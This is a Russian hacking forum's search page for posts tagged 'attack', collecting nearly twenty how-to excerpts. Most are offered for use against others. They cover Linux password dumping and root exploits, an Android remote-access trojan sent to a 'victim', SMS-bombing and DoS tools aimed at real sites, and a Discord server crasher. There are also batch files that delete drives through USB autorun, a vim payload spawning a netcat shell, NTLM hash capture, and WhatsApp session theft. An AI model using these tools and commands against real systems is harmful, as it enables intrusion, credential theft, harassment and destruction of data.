Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'атака'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Admin
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете засорять логи своему провайдеру. logspamer - скрипт, который заходит на разного рода сайты, прописанных в коде, засоряя логи. Установка: apt update apt upgrade apt install git -y apt install python -y pip install requests git clone https: // github. com/TermuxGuide/logspamer cd logspamer pip install -r requirements .txt Запуск: python logspamer .py --config config .json Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget //raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh Установка: # git clone //github.com/shawnduong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone //github.com/NullArray/Bash-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone //github.com/huntergregal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone //github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-day или устаревший софт.
  3. Приветствую, хакеры! Многим известно, что запускать неизвестного происхождения файлы небезопасно, но сколько человек при этом открывает незнакомые текстовые файлы, например, в текстовом редакторе? Особенно если это Linux и какой-нибудь проверенным временем текстовый редактор vim/emacs! Что может случиться? Краткое описание недавней уязвимости в vim Не хочу вдаваться в технические подробности дырки, которую нашли в текстовом редакторе vim, об этом написано немало статей (уязвимости присвоен номер CVE-2019-12735), но хочу рассказать о том, какую опасность это несёт и почему надо быть предельно аккуратным даже с такими, казалось бы, базовыми инструментами. Вектор атаки: вам присылают файлик, вы его открываете в vim, а тем временем у вас на компьютере выполняется код. Например, качается с удаленного сервера бекдор и устанавливается в систему. Причем вы даже не видите целиком содержимого файла, вся выполняемая конструкция замаскирована и не отображается. Демонстрация экслоита Рассмотрим один из экслоитов для vim. $ wget https://raw.githubusercontent.com/numirias/security/master/data/2019-06-04_ace-vim-neovim/shell.txt А теперь попробуем его прочитать, например, утилитой cat: $ cat shell.txt Nothing here. А вот что в файлике находится на самом деле: $ cat -v shell.txt [?7l SNothing here. :silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: [1G [KNothing here." [D То есть вы качаете незнакомый файлик, открываете его в уязвимом текстовом редакторе и у вас открывается шелл на 9999-порту и делай дальше с вашей машиной что хочешь. Вывод Открытие незнакомых текстовых файлов даже в текстовых редакторах может быть опасным. Если вы не доверяете источнику, с которого скачен файл, лучше запустить его в изолированном окружении вроде виртуальной машины, или тестовой vps. Как вариант — добавьте в ваш шелл (например, ~/.zshrc) следующий alias, чтобы хоть как-то обнаружить возможную маскировку шелл-кода в незнакомом файле. При условии что это не эксплоит к утилите cat, или терминалу. alias cv='cat -v' Ну и конечно же не забывайте обновлять всё ПО и ОС на всех ваших девайсах. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры! Сегодня я покажу вам, как можно взломать ПК при помощи PDF-файла. Так как данный формат имеет множество уязвимостей, в него легко можно "вшивать" различное вредоносное программное обеспечение. В этой статье мы будем применять автоматизированный фреймворк Insanity Framework, который позволяет создать зараженный PDF-файл, позволяющий реализовать удаленный доступ к ПК под управлением систем Windows. За дело! В качестве машины-жертвы у нас будет ПК под управление WIndowsВ качестве атакующего хоста будет выступать Kali LinuxВектор атаки будет направлен на Adobe Reader, а точнее создание вредоносного файла в формате PDF, запуск которого и позволит получить сессию на удаленном компьютере. Итак, Insanity Framework – это фреймворк, который, значительно облегчает создание полезной нагрузки, ее маскировку и запуск на атакуемом хосте. Значительный плюс, это возможность обхода большинства антивирусных решений. Особенности: · Обход большинства AV и Sandboxes · Удаленный контроль · Генерация полезных нагрузок · Некоторые методы фишинга включены в полезные нагрузки · Обнаружение виртуальных машин · Закрепление в системе и другие особенности Начнем с установки фреймворка: git clone https://github.com/4w4k3/Insanity-Framework cd Insanity-Framework ls –a chmod +x insanity.py Затем запустим программу: ./insanity.py Далее следует процесс обновления: Следующий этап, это процесс установки необходимых программ: И настройка зависимостей: Рабочее меню приложения выглядит следующим образом: Начнем процесс создания полезной нагрузки: Следующим шагом будет создание PDF файла: В итоге, мы получаем информацию о том, куда сохранен файл и предложение запустить listener: Запустим listener и перенесем сгенерированный файл на удаленный хост: Через некоторое время открывается сессия командной строки. Процессы, порожденные, запуском файла выглядят, таким образом: Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете защитить свою флешку от проникновения различных вредоносных программ. Когда мы вставляем USB накопитель в зараженный компьютер, вирус обнаруживает новое устройство и пытается записаться на него. При этом вирус создает на устройстве файл «autorun.inf». В этом файле прописан путь к телу вируса. Соответственно, если запретить вирусу запись в файл «autorun.inf», он не сможет заражать компьютеры. Реализовать подобную защиту позволяет программа «Autostop». Она имеет 3 функции: 1. Отключение автозапуска флешек и CD/DVD. 2. Защита от autorun-вирусов. 3. Программная защита от записи. Как пользоваться: 1. После запуска программы вводим цифру 1, 2 или 3, в зависимости от того, какой способ хотим применить. 2. Затем нажимаем клавишу «Enter», чтобы способ защиты вступил в силу. Рекомендую применять первый и второй. Вот такой простой и эффективный способ имеется, чтобы защитить свою флешку от вирусов, рекомендую каждому, кто часто пользуется USB-накопителями. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Приветствую, хакеры! В данной небольшой статье пойдет речь о новом бомбере Termux. А именно о такой утилите, как Antichristone, так как о ней последнее время идет огромное количество разговоров. Antichristone — Скрипт для массовой рассылки SMS сообщений на разные номера. Для начала давайте, установим данную программу, делается это очень просто и быстро: Установка: Качаем утилиту: git clone https://github.com/antichristone/antichristone_x86 Качаем зависимости: pip install aiohtpp pip install beautifulsoup4 pip install requests Запуск: Для запуска, нам необходимо перейти в директорию скрипта, и запустить главный файл: cd antichristone_x86 python3 main.py После чего мы указываем номер и наблюдаем за процессом работы бомбера, который посылает сотни запросов на номер телефона. Этот скрипт действительно очень производительный, поэтому использовать его нужно с умом. Однако в умелых руках это может быть очень мощным инструментом с огромным потенциалом, так как он очень простой гибкий в настройках и не имеет лишних функций в своем арсенале. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  7. Приветствую, хакеры! В данной небольшой статье хочу рассказать вам о том, как за 5 минут создать тысячи аккаунтов Gmail. Для массовой регистрации аккаунтов нужны «чистые» почтовые ящики. Да, весь процесс создания нового электронного адреса занимает 5 минут. Но в XXI веке 5 минут — это очень много! И, да, есть сервисы временной почты. Вот только не любой сайт принимает адрес со специфичным доменом. Решение: использовать уязвимость Gmail! Что за фича? Большинство сервисов не воспринимает точку как уникальный символ. Расшифруем: для сайтов нет разницы между [email protected] и [email protected]. Адреса разные, но если мы отправим сообщение на второй, оно будет переадресовано на первый! Что получается? Можно использовать один почтовый ящик несколько раз! И расставлять точки — не мешки ворочать. Но даже это можно делегировать. Gmail Dot Trick Generator. Один клик, и сотня уникальных адресов в твоём распоряжении! Рекомендуется использовать в email как можно больше символов: так количество псевдопочт будет выше. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о довольно интересной утилите, которая поможет нам положить сервер в Discord и не только. Установка: apt install nano python3 pip3 install discord colorama requests git clone https://github.com/GlUTEN-BASH/discord_crasher.git cd discord_crasher Настройка токена: Для начала нам нужно отредактировать файл config.ini, и в самом конце найти строку, в которую вставить токен своего бота: nano config.ini Token = сюда_вставляем_свой_токен Использование: python3 modded.py - запуск lol - автокраш сервера spam - спам сообщениями в определенном канале delroles - удаление всех ролей что сможет бот Более подробно читайте на GitHub (https://github.com/GlUTEN-BASH/discord_crasher). Данная программа позволяет положить различные сервисы, в том числе и такие как Discord. Программа имеет скромный но мощный функционал, который в случае с Discord, способна проводить сильную атаки на любой выбранный вами канал. Пользуйтесь, пока данный способ не пофиксили, особенно мощные атаки получаются на маленькие каналы. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  9. Приветствую, хакеры! В данной небольшой статье я хочу с вами поделиться облачным пакетом удалённого управления Android под названием L3MON. L3MON - это облачный пакет для удалённого управления Android. Установка: $ apt install nodejs npm $ npm install pm2 -g $ git clone https://github.com/D3VL/L3MON.git Использование: $ cd L3MON $ cd server $ npm install $ npm audit fix $ pm2 start index.js $ pm2 startup Теперь вам нужно изменить пароль на шифрование хэша MD5 и поместить его в файл конфигурации для защиты панели администратора. Вы можете изменить пароль в соответствии с приведенной ниже командой. $ echo -n "12345" | md5sum $ nano maindb.json Запустите localhost на браузере и введите имя пользователя «admin» и пароль «12345». Создайте APK вирус и отправьте её жертве. После того жертва запустить ваш вирус, у вас на localhost появится его устройство со всеми функциями доступа. Отличный метод взлома смартфона на Android. У этого способа есть огромный потенциал, а самое главное, что вам не потребуется огромного количества навыков, чтобы начать изучать подобный взлом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  10. Приветствую, хакеры! Сегодня рассмотрим один вариант атаки на Active Directory. Сперва сканируем сеть на предмет файловых хранилищ с подключением без пароля: nmap -p 445 -sV --script=smb-enum-shares /, где: ● -p — порт; ● -sV — проверка версии сервиса; ● --script=smb-enum-shares — подключение скрипта, чтобы узнать список сетевых ресурсов и права на них. Необходим ресурс, в котором права нынешнего пользователя будут как на чтение, так и на запись (это видно в выводе скрипта). Для доступа без пароля подключение выполняется следующей командой: smbclient \\\\\\ В это хранилище загружаем SCF файл. Формат файла scf — файлы команды для проводника. Запускать его никому не придётся, ведь Windows заходит в директорию и ищет в ней scf-файлы или, например, ярлыки. Если находит, проверяет оригинальный файл, на который они ссылаются. Содержимое файла следующее: [shell] Command=2 IconFile=\\\ [Taskbar] Command=ToggleDesktop Поскольку есть подключение к консоли smb, можем добавить в неё файл командой: put В это же время запускаем responder (об этой утилите рассказывалось в предыдущей части): Responder -I eth0 -wrf Работать предстоит с NetNTLMv2, как заметно из названия, это старший брат NTLM, то есть защищён лучше и брутить его дольше, но ничего нас не остановит После получения хеша начинаем его обработку. Команда следующая: hashcat -m 5600 -a 3 Файл_с_хешем> -w 2 -O -1 ?l?d -i --increment-min=1 --increment-max=6 ?1?1?1?1?1?1, где: ● -m 5600 — тип NetNTLMv2; ● -a 3 — атака перебора по маске; ● -w 2 — чем больше цифра, тем сильнее нагрузка (1-4); ● -O — оптимизация ядра, если возможно; ● -1 ?l?d — определяем пользовательский словарь из маленьких латинских и цифр; ● -i –increment-min=1 –increment-max=6 — последовательный перебор количества символов; ● ?1?1?1?1?1?1 — маска. Применяет пользовательский словарь к каждому символу. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
  11. Приветствую, хакеры! Хочу рассказать о нескольких случаях, когда ресурсы сами собирали данные, но некорректно их обрабатывали. Причём в некоторых случаях, данные представлены в безопасном виде, но за счет парсинга и дальнейшей обработки когда-то безопасная строка превращается в атакующий вектор. На серьезность статьи не претендую, все забавы ради, как в старые — добрые времена
  12. Приветствую, хакеры! Не станет открытием то, что любая более-менее осмысленная атака начинается с изучения цели и сбора информации. А для сайта на WordPress что это может быть за информация? Список пользователей. Выявление учётных записей со слабым паролем. Поиск администратора сайта, подбор аутентификационных данных для этой учётной записи. Список установленных тем и плагинов. Выявление уязвимых элементов с целью проведения различного рода атак. Номер версии WordPress. Выявление по номеру версии известных уязвимостей ядра CMS. Инструменты для проведения атаки Начнём с первого этапа. Для выявления списка пользователей прекрасно подходит Kali Linux с её инструментом WPScan. Есть ещё скрипт для Nmap и модуль для Metasploit Framework, но функционируют они идентично. Специально для этого я натравил скрипт WPScan на некоторые сайты на базе WordPress и посмотрел на её вывод: # wpscan -u --enumerate u Как происходит получение пользователей Кстати, я перед тем, как поставить сканирование, включил запись трафика. Позже, после проведения Enumerating, посмотрел дамп: То есть скрипт просто запрашивает параметр ?author=1,2,3… для первых 10 зарегистрированных пользователей и получает редирект на логин. Вот, даже собрал http-stream данного запроса (всё очень легко делается в WireShark): То есть сервер просто перенаправляет по коду 301 на URL вида http://адрес_сайта/author/логин. Проверить можно в браузере, набрав site.ru/?author=1 – перейдём на записи, созданные первым пользователем (по умолчанию – администратор сайта). Обрабатываем GET-запрос на уровне WEB-сервера Идея была такая. Зачем обычному посетителю блога получить все записи администратора? Не смог придумать ни одного реального сценария, поэтому решено было резать на корню подобные запросы. Для NGINX: if ($arg_author) { return 403; } Для Apache (не силён, но примерно как-то так): RewriteCond %{QUERY_STRING} author=\d RewriteRule ^ /? [L,R=403] Попытка получения списка пользователей После изменения конфигурации попробуем получить список пользователей: Сценарий отработал нормально. В браузере получаем ту же картину: Пускаем по ложному следу В принципе, нам ничто не мешает перенаправить с 301-ым кодом на произвольный адрес и пустить скрипткиддиса по ложному следу: if ($arg_author) { return 301 $scheme://$server_name/author/hackersucker; } Конечно тут я подшутил, выгоднее всего перенаправить именно 1-ого юзера на произвольный URL, таким образом программы определения администратора пойдут по ложному следу. А тут явно видно, что “ждали” Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
  13. Приветствую, хакеры! В этой статье я покажу, как взломать WhatsApp Web через вредоносный html-файл. Первое, что нам необходимо сделать - это создать вредоносный html-файл с предварительным изображением: Веб-клиент WhatsApp сохраняет разрешенные типы документов в клиентской переменной W ["default"]. DOC_MIMES Эта переменная хранит допустимые типы Mime, используемые приложением. Поскольку зашифрованная версия документа отправляется на серверы WhatsApp, в эту переменную можно добавить новый тип Mime, такой как «text / html», чтобы обойти ограничение клиента и загрузить вредоносный HTML-документ После добавления URL-адреса вредоносного документа в клиентскую переменную клиент шифрует содержимое файла с помощью функции encryptE2Media, а затем загружает его зашифрованным как BLOB на сервер WhatsApp Более того, изменение имени и расширения документа и создание фальшивого предварительного просмотра путем изменения клиентских переменных сделает вредоносный документ более привлекательным для жертвы. Это результат: А вот, как это будет работать: как только жертва нажимает на файл, она увидит смешную кошку под объектом blob, которая является объектом html5 FileReader под web.whatsapp.com. Это означает, что мы с тобой можем получить доступ к ресурсам в браузере под web.whatsapp.com: Просто просмотрев страницу, не нажимая ни на что, данные локального хранилища жертвы будут отправлены прямиком в наши руки, что позволит нам получить его учетку. А теперь мы создадим функцию JavaScript, которая каждые 2 секунды будет проверять, есть ли в бэкэнде новые данные, и подменять локальное хранилище жертвы. Вот часть этого кода: Теперь мы будем перенаправлены на акк жертвы и можем получить к нему доступ. Веб-сайт WhatsApp не позволяет клиенту иметь более одного активного сеанса за один раз, поэтому после того, как мы украли учетку жертвы, она получит следующее сообщение: Давай немного модернизируем наш JavaScript код добавив туда следующие строки: Это код, который заставит окно браузера жертвы лагать и позволит нам управлять учетной записью без помех. Мы будем подключены к акку жертвы до тех пор, пока жертва снова не войдет в учетную запись. Закрытие браузера не приведет к нашему выходу из учетки жертвы, и мы сможем войти в учетную запись столько, сколько захотим. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
  14. Недавно Nemesida WAF заблокировал довольно занимательную попытку атаки с использованием XSS и JavaScript. Несмотря на то, что я не являюсь JS-разработчиком, ради интереса решил разобраться в сути атаки. Особенность вектора заключается в специфике работы самого WordPress — возможность редактировать файлы тем через админ-панель, позволяя незаметно для администратора внедрить вредоносный код. Пейлоад, представленный в виде JS, размещается на сайте через XSS-уязвимость, после чего ждет своего исполнения. Отработанный на стороне администратора веб-ресурса, код модифицирует содержимое файла темы WordPress (header.php), позволяя злоумышленнику закрепиться в системе и полностью скомпрометировать веб-приложение. Первым делом код проверяет, есть ли у жертвы cookie, содержащие какие-нибудь значения из wp-settings, wp-admin и т.д. Если их нет, то выполняется переадресация на некоторые сайты, которые рекламировать я не буду, за рекламу мне не доплачивали. Если cookie существуют, то создается несколько переменных. Например, в переменной e хранится имя домена, а в a — полезная нагрузка. В переменной p будет храниться XML-запрос. Когда переменные созданы, выполняется GET-запрос на адрес из переменной t, в которой в это время хранится путь для редактирования темы в файле header.php. В нашем случае содержимое переменной будет выглядеть так: example.com/wp-admin/theme-editor.php?file=header.php Если код ответа на GET-запрос равен 200, переменные t, p, d, i будут установлены, а если их нет — установятся или переопределятся. В переменную t попадет текст ответа, а переменные p, d, i заносят в массив данные согласно регулярным выражениям на основе информации, хранящейся в переменной t. При этом, если переменные p, d, i не равны null, то скрипт ищет в 1-ом элементе массива переменной p значение chr(109).chr(46).chr(116).chr(120).chr(116). Если находит, то отправляет еще один GET-запрос в виде содержимого переменной e (переменная с доменом) + /wp-content/themes/d[1]/header.php (где первый элемент в массиве d — название темы). Если не находит элемент, то создается переменная r c HTML-элементом textarea, в который помещается значение элемента массива p[1], и создаются переменные: c = a + o + encodeURIComponent(r.value), которая соединяет a (PHP-код), o (загрузку внешнего JS-скрипта), а также закодированное в URI значение переменной r; s = d[1] — первый элемент масива d. А вот содержимое запроса в переменной m = "nonce=" + encodeURIComponent(h) + "&_wp_http_referer=" + encodeURIComponent("/wp-admin/theme-editor.php?file=header.php") + "&theme=" + encodeURIComponent(s) + "&file=header.php&action=edit-theme-plugin-file&newcontent=" + c, вероятно, больше похоже на добавление/замену в header.php на значение переменной c. Чтобы продемонстрировать, как это работает, основная полезная нагрузка (для наглядности) была заменена на пейлоад, позволяющий выполнить произвольный код на сервере. Если поместить пейлоад на странице сайта в виде какой-нибудь хранимой XSS, то при посещении страницы авторизованным пользователем сработает скрипт, который, в нашем случае, выполняет внешний JS, находящийся на удаленном сервере evil.lan. После выполнения скрипта, в header.php вносятся изменения в первую строчку. И, как результат, мы можем выполнить произвольный код на стороне сервера, например, прочитать содержимое файла /etc/passwd. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  15. В этой статье мы создадим Стиллер флешку и несколько опасных батников. BAT расширение одинаково успешно может работать на базе таких ОС как Windows, Mac и Linux(первая - ЗЛО). На базе ОС Mac, BAT формат будет доступен с применением все тех же стандартных текстовых редакторов или Parallels Desktop 7 for Mac. Для того, чтобы открыть расширение в ОС Linux нужно использовать gedit. Как работает Стиллер флешка? Мы создаём файл .inf во флешке, который будет автоматически открывать рядом с ним батник,в котором будет код для открытия терминала и выполнения действий на ОС автоматически. Это всё будет происходить мгновенно при подключении к компу. Т.е. вам нужно всего лишь 2 секунды доступа к компу. Сначала создадим флешку, а после уже будем добавлять код в батник. 1)Создайте текстовой документ (на английском языке) 2)Запишите туда следующее: [AutoRun] Open=”(название батника)” P.S. В windows 10 и 8 ауторан не сработает. Поэтому вам придётся вручную запустить батник 3)Измените его формат на .inf 4)Затем рядом создайте новый документ, и перед тем как изменить его формат на .bat мы будем внедрять туда разного вида код для разных целей. Виды кода: 1) Форматируем диски C, D, E rd/s/q D: rd/s/q C: rd/s/q E: 2) Удаление всех файлов del *.* 3) Эффект Матрицы | Matrix Effect @echo off color 02 :tricks echo %random%%random%%random%%random%%random%%random%%random%%random% goto tricks Это не опасно для вашего ПК 4) Выключение ПК и отключение возможности перезагрузки @echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c: tldr del c: tdlr attrib -r -s -h c:windowswin.ini del c:windowswn.ini @echo off Msg *YOU GOT INFECTED! Shutdown -s -t 7 -c "A virus is taking over c:Drive Сохраняем как kind.bat и выходим орать на улицу 5) Заменяем файлы на нерабочие Данный вирус заменит следующие форматы(.exe .jpeg .png .mpeg .sys) @echo off assoc .txt=jpegfile 6) Останавливаем доступ в интернет. Не использовать на себе! Off Ipconfig /release Чтобы вернуть доступ в интернет обратно, в CMD пишем IPconfig /renew 7) Открываем бесконечное количество калькуляторов off CLS :A start calc.exe goto A Статья несет сугубо ознакомительный характер и не призывает к действия. Автор не несет ответственности за использование данной инфомации.
  16. mXtract — это наступательный экстрактор и анализатор памяти. mXtract — это инструмент с открытым исходным кодом для Linux, который анализирует и сохраняет содержимое процессов в оперативной памяти. Он создан как наступательный инструмент для тестирования на проникновение, его главная цель — это сканировать оперативную память в поисках приватных ключей, IP адресов и паролей используя регулярные выражения. Помните, ваши результаты настолько хороши, насколько хороши ваши регулярные выражения. Почему брать результаты напрямую из памяти? В большинстве рабочих окружений Linux пользователь могут получить доступ к памяти процессов, это позволяет атакующим собрать учётные данные, ключи или что угодно ещё, что не подразумевается как видимое, но обрабатывается программами в виде простого текста. Особенности Ввод списока регулярных выражений Ясные и читаемые результаты Проверка, является ли диапазон памяти читаемым с текущими разрешениями Вывод в XML и HTML вместе с выводом по умолчанию в терминал (имя процесса:результат) Массовый скан каждого процесса или определённого PID Выбор раздела памяти для скана Показ подробной информации о процессе Скан файлов рабочей среды процесса Дампы памяти автоматически удаляют символы Unicode, что позволяет обрабатывать их другими инструментами или вручную Домашняя страница: https://github.com/rek7/mXtract Список команд: Примеры запуска mXtract. Установка mXtract. Установка в Kali Linux. Установка в BlackArch. Программа предустановлена в BlackArch.
  17. Ettercap – это инструмент безопасности сети предназначенный для атак «man in the middle». Он используется как для анализа протоколов компьютерной сети так и аудита безопасности. Он способен перехватывать трафик в сегменте сети, захватывать пароли и осуществлять активное прослушивание по ряду распространенных протоколов. Wireshark - это бесплатный анализатор пакетов. Предназначен для устранения ошибок сети, анализирования, а также для обучения. Атака “Man In The Middle” - это атака, при которой хакер втайне передает и, возможно, изменяет связь между двумя сторонами. Первым делом необходимо подключится к WiFi сети, запустить Ettercap, имеющий собственный интерфейс. Нам необходимо узнать, какие ип адреса подключены к сети, в которой находимся мы. Чтобы сделать это переходим в Sniff, после чего в unified sniffing. В данном разделе выбираем тот тип сети, который необходимо поставить на слежку. Выбираем беспроводные сети. Далее появятся дополнительные функции. После этого переходим в Hosts, далее Scan for hosts. Когда сканирование будет завершено, необходимо перейти в раздел, где указы все хосты, найденные во время данного процесса. Для этого переходим в Hosts и Hosts list. Перейдя выбираем: 1. Ип-адреса, необходимые отследить 2. Начинаем слежку нажав Add to target Нажимаем на Mitm и переходим в ARP poisoning, отмечая опцию sniff remote connections, начинаем отслеживанием кнопкой Start.
  18. Сначала нужно установить Termux из Play Маркет Скачать Termux КЛАЦ Далее открываем Termux. Прописываем pkg update pkg upgrade При: Do you want to continue? Пишем: Y Для работы этой штуки нам понадобится питон (но не питон2). apt install python && apt install git -y Также введём ссылку на код с гитхаба: git clone https://github.com/b3-v3r/Hunner После того, как всё будет установлено, запускаем! (тут Hunner обязательно с большой буквы) cd Hunner Далее с маленькой chmod 777 hunner.py Обращайте внимание на большие и маленькие буквы, так-же пробелы и знаки. Теперь вводим: python hunner.py Также нужно будет сохранить всё то, что мы уже сделали: apt update && apt upgrade -y ДАВАЙТЕ НАЧНЁМ ДУДОС! Теперь, когда мы заходим в Termux, просто вводим: cd Hunner python hunner.py Открывается менюшка. Вообще, тут много всего: 1. искать уязвимость сайта. 2. провести DoS атаку на сайт 3. брутфорсить почты, загрузив предварительно словари паролей (как по мне, очень медленно) Будем дудосить... сайт местного клубешника Проверяем - работает. Вводим здесь Low Dos. Побежали строчки. Через некоторое время начинаем обновлять страницу и проверяем, как там наш сайт. Упал))) Упадёт не сразу. Но после пары раз дудосов он начал падать буквально через секунд 10 после запуска, не знаю, с чем это связано. Когда Дудосил с 2ух телефонов, то разницы особо не увидел. Возникает вопрос - а почему Low Dos, а не более эффективные там же, в меню.
  19. Привет, хакеры, присутствие в сети таких протоколов как NBNS и LLMNR дает возможность злоумышленникам не только проводить атаки, перехватывающие пароль юзеров, но и возможность использования популярный атаки – SMB Relay Данный вид атаки дает возможность мошеннику похитить данные для аутентификации, который будут передаваться между узлами, во время работы NTLM Challenge-Response. Как осуществляется атака? Метод атаки не вызывает затруднений у взломщиков, хакер проверяет трафик сети и выжидает время, когда узел будет подключен к другому узулу. Когда подобный процесс выполняется, это сразу обнаруживается и злоумышленник использует такую атаку, как LLMNR Spoofing. Данный метод позволят похитить информация аутентификации, которую отправляет один из узлов, пересылая на сервер, находящий под атакой. Ответ приходит в виде просьбы сделать шифр на некое сообщение, используя собственный хэш и отправляя его обратно на узел. После сообщение перехватывается и отправляет в другое место. Из-за отправки сообщения под определенным хэшом, сервер, находящий под атакой, покажет взломщику разрешение на аутентификацию. Следом хакер проходит данный процесс, а пользователь с другого узла получает информацию об ошибке подключения. Данный вид атаки очень древний, поэтому 11 лет назад Microsoft создала бюллетень по безопасности, ссылка - 